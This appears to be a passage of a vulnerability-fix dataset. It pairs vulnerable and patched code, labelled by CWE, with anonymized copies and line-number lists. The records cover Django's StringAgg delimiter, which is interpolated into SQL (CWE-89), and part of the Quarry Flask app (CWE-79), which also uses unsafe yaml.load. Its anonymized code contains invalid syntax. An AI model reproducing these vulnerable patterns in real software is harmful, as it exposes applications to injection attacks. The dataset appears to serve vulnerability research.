VAR_30.assert_called_once_with(VAR_6=name, VAR_27=required, VAR_24=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def FUNC_15(self, VAR_1, VAR_2, VAR_3):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type=VAR_2)
VAR_31 = VAR_1.patch(f"{VAR_0}.{VAR_3}")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_31.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_31()
VAR_31.reset_mock()
VAR_24.default = VAR_1.MagicMock()
property_from_data(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_31.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_16(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
VAR_32 = VAR_1.patch(f"{VAR_0}.ListProperty")
VAR_33 = VAR_1.patch(f"{VAR_0}.FloatProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_33.assert_called_once_with(VAR_6=name, VAR_27=True, default="0.0")
VAR_32.assert_called_once_with(
VAR_6=name, VAR_27=required, default=None, VAR_10=VAR_33.return_value
)
assert VAR_5 == VAR_32.return_value
def FUNC_17(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(type="array")
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == PropertyError(VAR_24=data, detail="type array must have items defined")
def FUNC_18(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(type="array", items={},)
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == PropertyError(VAR_24=oai.Schema(), detail=f"invalid VAR_24 in items of array {VAR_6}")
def FUNC_19(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
VAR_34 = VAR_1.patch(f"{VAR_0}.UnionProperty")
VAR_33 = VAR_1.patch(f"{VAR_0}.FloatProperty")
VAR_35 = VAR_1.patch(f"{VAR_0}.IntProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_33.assert_called_once_with(VAR_6=name, VAR_27=required, default="0.0")
VAR_35.assert_called_once_with(VAR_6=name, VAR_27=required, default="0")
VAR_34.assert_called_once_with(
VAR_6=name,
VAR_27=required,
default=None,
inner_properties=[VAR_33.return_value, VAR_35.return_value],
)
assert VAR_5 == VAR_34.return_value
def FUNC_20(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(anyOf=[{}])
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == PropertyError(detail=f"Invalid property in union {VAR_6}", VAR_24=oai.Schema())
def FUNC_21(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type=VAR_1.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
assert property_from_data(VAR_6=name, VAR_27=required, VAR_24=data) == PropertyError(
VAR_24=data, detail=f"unknown type {VAR_24.type}"
)
def FUNC_22(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
VAR_24 = oai.Schema()
assert property_from_data(VAR_6="blah", VAR_27=True, VAR_24=data) == PropertyError(
VAR_24=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
def FUNC_23(self, VAR_1):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
VAR_1.patch(f"{VAR_0}._property_from_data").side_effect = ValidationError()
VAR_24 = oai.Schema()
assert property_from_data(VAR_6="blah", VAR_27=True, VAR_24=data) == PropertyError(
detail="Failed to validate default value", VAR_24=data
)
class CLASS_14:
def FUNC_24(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string")
VAR_36 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=None, default=None)
assert VAR_5 == VAR_36.return_value
VAR_36.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_24.pattern = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=VAR_24.pattern, default=VAR_24.default)
def FUNC_25(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format="date-time")
VAR_37 = VAR_1.patch(f"{VAR_0}.DateTimeProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_37.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_37.return_value
VAR_37.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_37.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_26(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format="date")
VAR_38 = VAR_1.patch(f"{VAR_0}.DateProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_38.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_38.return_value
VAR_38.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_38.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_27(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format="binary")
VAR_39 = VAR_1.patch(f"{VAR_0}.FileProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_39.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_39.return_value
VAR_39.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_39.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_28(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format=VAR_1.MagicMock())
VAR_36 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=None, default=None)
assert VAR_5 == VAR_36.return_value
VAR_36.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_24.pattern = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=VAR_24.pattern, default=VAR_24.default)
| [
2,
5,
7,
8,
12,
15,
19,
22,
27,
31,
34,
37,
42,
45,
46,
50,
52,
54,
57,
59,
63,
64,
68,
76,
83,
84,
88,
96,
103,
104,
108,
114,
121,
122,
126,
131,
135,
138,
141,
147,
158,
167,
168,
172,
180,
184,
187,
198,
211,
212,
216,
224,
228,
232,
238,
239,
245,
246,
258,
260,
264,
266,
268,
273,
278,
280,
282,
286,
293,
296,
298,
300,
307,
310,
312,
315,
318,
322,
325,
329,
330,
334,
338,
340,
342,
344,
347,
351,
353,
356,
360,
362,
364,
370,
378,
379,
383,
386,
389,
397,
403,
411,
412,
419,
421,
423,
429,
432,
439,
446,
448,
450,
454,
461,
463,
466,
481,
483,
485,
488,
489,
492,
497,
504,
506,
508,
514,
519,
521,
523,
525,
530,
532,
534,
536,
544,
546,
548,
558,
563,
565,
567,
569,
574,
577,
581,
585,
590,
591,
598,
600,
602,
605,
606,
610,
615,
621,
623,
625,
628,
629,
632,
637,
643,
645,
649,
650,
653,
658,
664,
666,
670,
671,
674,
679,
685,
687,
689,
692,
693,
697,
702
] | [
2,
4,
8,
10,
11,
15,
17,
20,
23,
26,
29,
33,
36,
41,
45,
48,
51,
56,
59,
62,
63,
65,
68,
71,
72,
76,
78,
82,
85,
88,
89,
93,
101,
108,
111,
114,
117,
118,
122,
130,
137,
140,
143,
146,
147,
151,
157,
164,
167,
168,
170,
173,
174,
178,
179,
181,
184,
187,
188,
192,
193,
195,
198,
201,
202,
206,
207,
209,
212,
213,
217,
222,
226,
229,
232,
238,
249,
258,
261,
266,
269,
272,
275,
279,
282,
283,
287,
295,
299,
302,
313,
326,
329,
339,
341,
343,
348,
349,
353,
361,
365,
369,
375,
376,
382,
383,
395,
397,
401,
403,
405,
410,
415,
417,
419,
423,
430,
433,
435,
437,
444,
447,
449,
452,
455,
459,
462,
466,
470,
472,
477,
482,
484,
485,
489,
493,
495,
497,
499,
502,
506,
508,
511,
515,
517,
519,
525,
533,
536,
539,
545,
546,
550,
558,
564,
572,
575,
577,
580,
581,
589,
591,
593,
599,
602,
609,
617,
619,
621,
625,
632,
634,
636,
639,
655,
657,
659,
662,
663,
666,
671,
679,
681,
683,
689,
694,
696,
698,
700,
706,
708,
710,
712,
721,
723,
725,
735,
741,
743,
745,
747,
752,
755,
759,
763,
768,
772,
774,
779,
780,
787,
789,
791,
794,
795,
799,
804,
810,
812,
814,
817,
818,
821,
826,
832,
834,
838,
839,
842,
847,
853,
855,
859,
860,
863,
868,
874,
876,
878,
881,
882,
886,
891
] |
2CWE-89
| from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class ArrayAgg(OrderableAggMixin, Aggregate):
function = 'ARRAY_AGG'
template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'
allow_distinct = True
@property
def output_field(self):
return ArrayField(self.source_expressions[0].output_field)
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class BitAnd(Aggregate):
function = 'BIT_AND'
class BitOr(Aggregate):
function = 'BIT_OR'
class BoolAnd(Aggregate):
function = 'BOOL_AND'
class BoolOr(Aggregate):
function = 'BOOL_OR'
class JSONBAgg(Aggregate):
function = 'JSONB_AGG'
output_field = JSONField()
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class StringAgg(OrderableAggMixin, Aggregate):
function = 'STRING_AGG'
template = "%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)"
allow_distinct = True
def __init__(self, expression, delimiter, **extra):
super().__init__(expression, delimiter=delimiter, **extra)
def convert_value(self, value, expression, connection):
if not value:
return ''
return value
| from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models import Value
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class ArrayAgg(OrderableAggMixin, Aggregate):
function = 'ARRAY_AGG'
template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'
allow_distinct = True
@property
def output_field(self):
return ArrayField(self.source_expressions[0].output_field)
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class BitAnd(Aggregate):
function = 'BIT_AND'
class BitOr(Aggregate):
function = 'BIT_OR'
class BoolAnd(Aggregate):
function = 'BOOL_AND'
class BoolOr(Aggregate):
function = 'BOOL_OR'
class JSONBAgg(Aggregate):
function = 'JSONB_AGG'
output_field = JSONField()
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class StringAgg(OrderableAggMixin, Aggregate):
function = 'STRING_AGG'
template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'
allow_distinct = True
def __init__(self, expression, delimiter, **extra):
delimiter_expr = Value(str(delimiter))
super().__init__(expression, delimiter_expr, **extra)
def convert_value(self, value, expression, connection):
if not value:
return ''
return value
| sql | {
"code": [
" template = \"%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)\"",
" super().__init__(expression, delimiter=delimiter, **extra)"
],
"line_no": [
54,
58
]
} | {
"code": [
"from django.db.models import Value",
" template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'",
" super().__init__(expression, delimiter_expr, **extra)"
],
"line_no": [
2,
55,
60
]
} | from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class CLASS_0(OrderableAggMixin, Aggregate):
VAR_0 = 'ARRAY_AGG'
VAR_1 = '%(VAR_0)s(%(distinct)s%(expressions)s %(ordering)s)'
VAR_2 = True
@property
def VAR_6(self):
return ArrayField(self.source_expressions[0].output_field)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_1(Aggregate):
VAR_0 = 'BIT_AND'
class CLASS_2(Aggregate):
VAR_0 = 'BIT_OR'
class CLASS_3(Aggregate):
VAR_0 = 'BOOL_AND'
class CLASS_4(Aggregate):
VAR_0 = 'BOOL_OR'
class CLASS_5(Aggregate):
VAR_0 = 'JSONB_AGG'
VAR_6 = JSONField()
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_6(OrderableAggMixin, Aggregate):
VAR_0 = 'STRING_AGG'
VAR_1 = "%(VAR_0)s(%(distinct)s%(expressions)s, '%(VAR_7)s'%(ordering)s)"
VAR_2 = True
def __init__(self, VAR_4, VAR_7, **VAR_8):
super().__init__(VAR_4, VAR_7=delimiter, **VAR_8)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return ''
return VAR_3
| from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models import Value
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class CLASS_0(OrderableAggMixin, Aggregate):
VAR_0 = 'ARRAY_AGG'
VAR_1 = '%(VAR_0)s(%(distinct)s%(expressions)s %(ordering)s)'
VAR_2 = True
@property
def VAR_6(self):
return ArrayField(self.source_expressions[0].output_field)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_1(Aggregate):
VAR_0 = 'BIT_AND'
class CLASS_2(Aggregate):
VAR_0 = 'BIT_OR'
class CLASS_3(Aggregate):
VAR_0 = 'BOOL_AND'
class CLASS_4(Aggregate):
VAR_0 = 'BOOL_OR'
class CLASS_5(Aggregate):
VAR_0 = 'JSONB_AGG'
VAR_6 = JSONField()
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_6(OrderableAggMixin, Aggregate):
VAR_0 = 'STRING_AGG'
VAR_1 = '%(VAR_0)s(%(distinct)s%(expressions)s %(ordering)s)'
VAR_2 = True
def __init__(self, VAR_4, VAR_7, **VAR_8):
VAR_9 = Value(str(VAR_7))
super().__init__(VAR_4, VAR_9, **VAR_8)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return ''
return VAR_3
| [
3,
5,
9,
10,
15,
19,
24,
25,
28,
29,
32,
33,
36,
37,
40,
41,
45,
50,
51,
56,
59,
64
] | [
4,
6,
10,
11,
16,
20,
25,
26,
29,
30,
33,
34,
37,
38,
41,
42,
46,
51,
52,
57,
61,
66
] |
1CWE-79
| import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, get_preferences
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
app = Flask(__name__)
app.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
app.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
# Is ok if we can't load config.yaml
pass
app.register_blueprint(auth)
app.register_blueprint(health_blueprint)
app.register_blueprint(user_blueprint)
app.register_blueprint(templatehelpers)
global_conn = Connections(app.config)
app.session_interface = RedisSessionInterface(global_conn.redis)
class QueriesRangeBasedPagination(RangeBasedPagination):
def get_page_link(self, page_key, limit):
get_params = dict(request.args)
get_params.update({
'from': page_key, 'limit': limit})
return url_for('query_runs_all', **dict(
[(key, value) for key, value in list(get_params.items())])
)
def order_queryset(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def filter_queryset(self):
if self.page_key is None:
return
from_query = g.conn.session.query(Query).get(self.page_key)
if from_query:
from_qrun_id = from_query.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > from_qrun_id)
else:
self.queryset = self.queryset.filter(
QueryRun.id < from_qrun_id)
@app.before_request
def setup_context():
g.conn = Connections(app.config)
@app.teardown_request
def kill_context(exception=None):
g.conn.close_all()
@app.route("/")
def index():
return render_template("landing.html", user=get_user())
@app.route("/api/query/unstar", methods=["POST"])
def unstar_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(star)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@app.route("/api/query/star", methods=["POST"])
def star_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = Star()
star.user = get_user()
star.query = query
g.conn.session.add(star)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@app.route("/query/new")
def new_query():
if get_user() is None:
return redirect("/login?next=/query/new")
query = Query()
query.user = get_user()
g.conn.session.add(query)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/fork/<int:id>")
def fork_query(id):
if get_user() is None:
return redirect("/login?next=fork/{id}".format(id=id))
query = Query()
query.user = get_user()
parent_query = g.conn.session.query(Query).filter(Query.id == id).one()
query.title = parent_query.title
query.parent_id = parent_query.id
query.description = parent_query.description
g.conn.session.add(query)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=parent_query.latest_rev.text)
query.latest_rev = query_rev
g.conn.session.add(query)
g.conn.session.add(query_rev)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/query/<int:query_id>")
def query_show(query_id):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
can_edit = get_user() is not None and get_user().id == query.user_id
is_starred = False
if get_user():
is_starred = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == query_id).scalar() == 1
jsvars = {
'query_id': query.id,
'can_edit': can_edit,
'is_starred': is_starred,
'published': query.published,
'preferences': get_preferences()
}
if query.latest_rev and query.latest_rev.latest_run_id:
jsvars['qrun_id'] = query.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
query=query,
jsvars=jsvars,
latest_rev=query.latest_rev
)
@app.route('/query/<int:query_id>/result/latest/<string:resultset_id>/<string:format>')
def query_output_redirect(query_id, resultset_id, format):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
qrun_id = query.latest_rev.latest_run_id
# FIXME: Enforce HTTPS everywhere in a nicer way!
resp = redirect(
url_for('output_result', qrun_id=qrun_id,
resultset_id=resultset_id, format=format,
_external=True, _scheme='https')
)
# CORS on the redirect
resp.headers.add('Access-Control-Allow-Origin', '*')
return resp
@app.route('/api/query/meta', methods=['POST'])
def api_set_meta():
if get_user() is None:
return "Authentication required", 401
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
query.title = request.form['title']
if 'published' in request.form:
query.published = request.form['published'] == '1'
if 'description' in request.form:
query.description = request.form['description']
g.conn.session.add(query)
g.conn.session.commit()
return json.dumps({'id': query.id})
@app.route('/api/query/run', methods=['POST'])
def api_run_query():
if get_user() is None:
return "Authentication required", 401
text = request.form['text']
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if query.latest_rev and query.latest_rev.latest_run:
result = worker.run_query.AsyncResult(query.latest_rev.latest_run.task_id)
if not result.ready():
result.revoke(terminate=True)
query.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(query.latest_rev.latest_run)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=text)
query.latest_rev = query_rev
# XXX (phuedx, 2014/08/08): This deviates from the pre-existing
# QueryRevision interface, but I'm not confident that SQLAlchemy would
# invalidate a cached result for a relationship if a property changed.
query_run = QueryRun()
query_run.rev = query_rev
query_run.status = QueryRun.STATUS_QUEUED
g.conn.session.add(query_run)
g.conn.session.add(query)
g.conn.session.commit()
query_rev.latest_run = query_run
query_run.task_id = worker.run_query.delay(query_run.id).task_id
g.conn.session.add(query_rev)
g.conn.session.add(query_run)
g.conn.session.commit()
return json.dumps({
'qrun_id': query_run.id
})
@app.route("/query/runs/all")
def query_runs_all():
queries = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
queries_filter = 'all'
if request.args.get('published') == 'true':
queries = queries.filter(Query.published)
queries_filter = 'published'
limit = int(request.args.get(
'limit', app.config.get('QUERY_RESULTS_PER_PAGE', 50)))
queries, prev_link, next_link = QueriesRangeBasedPagination(
queries, request.args.get('from'), limit,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), queries=queries,
prev_link=prev_link, next_link=next_link,
queries_filter=queries_filter)
@app.route('/run/<int:qrun_id>/status')
def run_status(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query_run id', status=404)
return Response(json.dumps({
'status': qrun.status_message,
'extra': json.loads(qrun.extra_info or '{}'),
'timestamp': qrun.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@app.route("/run/<int:qrun_id>/output/<int:resultset_id>/<string:format>")
def output_result(qrun_id, resultset_id=0, format='json'):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
response = Response('No such query_run id', status=404)
else:
reader = SQLiteResultReader(qrun, app.config['OUTPUT_PATH_TEMPLATE'])
try:
response = output.get_formatted_response(format, qrun, reader, resultset_id)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
response = Response('No such resultset id', status=404)
else:
raise
response.headers['Access-Control-Allow-Origin'] = '*'
return response
@app.route("/run/<int:qrun_id>/meta")
def output_run_meta(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query run id', status=404)
return Response(json.dumps(
{
'run': qrun,
'rev': qrun.rev,
'query': qrun.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/rev/<int:rev_id>/meta")
def output_rev_meta(rev_id):
rev = g.conn.session.query(QueryRevision).get(rev_id)
if not rev:
return Response('No such query revision id', status=404)
return Response(json.dumps(
{
'latest_run': rev.latest_run,
'rev': rev,
'query': rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/query/<int:query_id>/meta")
def output_query_meta(query_id):
query = g.conn.session.query(Query).get(query_id)
if not query:
return Response('No such query id', status=404)
return Response(json.dumps(
{
'latest_run': query.latest_rev.latest_run,
'latest_rev': query.latest_rev,
'query': query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/explain/<int:connection_id>")
def output_explain(connection_id):
cur = g.conn.replica.cursor()
try:
cur.execute('SHOW EXPLAIN FOR %d;' % connection_id)
except cur.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
# 1094 = Unknown thread id
# 1915, 1933 = Target is not running an EXPLAINable command
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in cur.description],
'rows': cur.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@app.route("/api/preferences/get/<key>")
def pref_get(key):
if get_user() is None:
return "Authentication required", 401
if key in get_preferences():
return Response(json.dumps({'key': key, 'value': get_preferences()[key]}))
else:
return Response(json.dumps({'key': key, 'error': 'novalue'}))
@app.route("/api/preferences/set/<key>/<value>")
def pref_set(key, value):
if get_user() is None:
return "Authentication required", 401
get_preferences()[key] = (None if value == 'null' else value)
return Response(json.dumps({'key': key, 'success': ''})), 201
if __name__ == '__main__':
app.run(port=5000, host="0.0.0.0")
| import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, get_preferences
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
app = Flask(__name__)
app.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
app.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
# Is ok if we can't load config.yaml
pass
app.register_blueprint(auth)
app.register_blueprint(health_blueprint)
app.register_blueprint(user_blueprint)
app.register_blueprint(templatehelpers)
global_conn = Connections(app.config)
app.session_interface = RedisSessionInterface(global_conn.redis)
class QueriesRangeBasedPagination(RangeBasedPagination):
def get_page_link(self, page_key, limit):
get_params = dict(request.args)
get_params.update({
'from': page_key, 'limit': limit})
return url_for('query_runs_all', **dict(
[(key, value) for key, value in list(get_params.items())])
)
def order_queryset(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def filter_queryset(self):
if self.page_key is None:
return
from_query = g.conn.session.query(Query).get(self.page_key)
if from_query:
from_qrun_id = from_query.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > from_qrun_id)
else:
self.queryset = self.queryset.filter(
QueryRun.id < from_qrun_id)
@app.before_request
def setup_context():
g.conn = Connections(app.config)
@app.teardown_request
def kill_context(exception=None):
g.conn.close_all()
@app.route("/")
def index():
return render_template("landing.html", user=get_user())
@app.route("/api/query/unstar", methods=["POST"])
def unstar_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(star)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@app.route("/api/query/star", methods=["POST"])
def star_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = Star()
star.user = get_user()
star.query = query
g.conn.session.add(star)
try:
